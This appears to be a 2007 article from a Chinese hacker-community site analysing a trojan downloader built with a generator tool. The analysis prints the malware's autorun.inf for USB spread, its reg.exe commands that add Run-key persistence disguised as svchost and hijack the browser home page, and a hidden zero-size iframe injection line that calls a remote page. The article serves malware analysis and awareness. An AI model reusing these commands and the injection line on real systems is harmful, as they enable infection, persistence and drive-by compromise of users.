牛X下载者生成器生成的网页木马 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文	用户登录新用户注册

牛X下载者生成器生成的网页木马

热

【字体：小大】

牛X下载者生成器生成的网页木马

作者：不详文章来源：CnXHacker.Net 点击数：更新时间：2007-7-3

这年头，做个守法公民真不容易，昨天有个曾经做过“黑客”的朋友做的网站被DDoS了，他打算重操旧业。为非作歹的程序员也层出不穷，下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。

又到大学生找工作的时候了，不晓得会有多少学生因就业问题，走到病毒开发者的队伍中去。

这是一个木马下载病毒，该病毒会删除被感染机器上的ghost备份文件，并且尝试感染脚本文件，尝试通过U盘传播把病毒本身传播出去。链接指定网址，下载其他木马程序。

1.%system%/SVSH0ST.EXE

%system%/Autorun.inf

1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe，并且创建autorun.inf文件，内容如下：

[AutoRun]



open=lcg.exe

shell/open=打开(&O)

shell/open/Command=lcg.exe

shell/open/Default=1

shell/explore=资源管理器(&X)

shell/explore/Command=lcg.EXE

2.创建互斥量"niux"

3.运行创建进程运行下面的命令：

reg.exe

"ADD HKLM//SOFTWARE//Microsoft//Windows//CurrentVersion//Run /V svchost /T REG_SZ /D "

"ADD HKLM//SOFTWARE//Microsoft//Windows//CurrentVersion//Run /V svchost /T REG_SZ /D 

C://WINNT//System32//SVSH0ST.EXE /F"

"add /"HKCU//Software//Microsoft//Internet Explorer//Main/" /v /"Start Page/" /t 

REG_EXPAND_SZ /d /f"

"add /"HKCU//Software//Policies//Microsoft//Internet Explorer//Control Panel/" /v 

/"HomePage/" /t REG_DWORD /d 00000001 /f"

4.枚举所有当前窗口，如果发现窗口信息中含有以下字符，就关闭该窗口：

"病毒"

5.遍历所有的盘符，如果文件后缀名为.GHO文件(ghost备份文件)，则删除该文件，如果文件名中含有以下的

INDEX.ASP

.HTM

INDEX.PHP

DEFAULT.ASP

DEFAULT.PHP

CONN.ASP

之一的责尝试在文件末尾插入代码：

<ｉｆｒａｍｅ src=http://*/test.htm width=0 height=0><　/　ｉｆｒａｍｅ　>

文章录入：IceRiver 责任编辑：IceRiver

上一篇文章：剖析Linux病毒原型工作过程和关键环节

下一篇文章：为C++标准库容器写自己的内存分配程序

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				带宽严重不足!美网络用户因过火狐浏览器下载次数突破4亿大警惕木马下载器将您的电脑变 Safari在处理Java Applet的下巧用下载利器IDM 防止浏览器本周病毒警惕：KL木马下载器美国一黑客利用谷歌免费下载 linux下的lcx Windows版本Safari 48小时内 Linux下防范缓冲区溢出攻击的

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM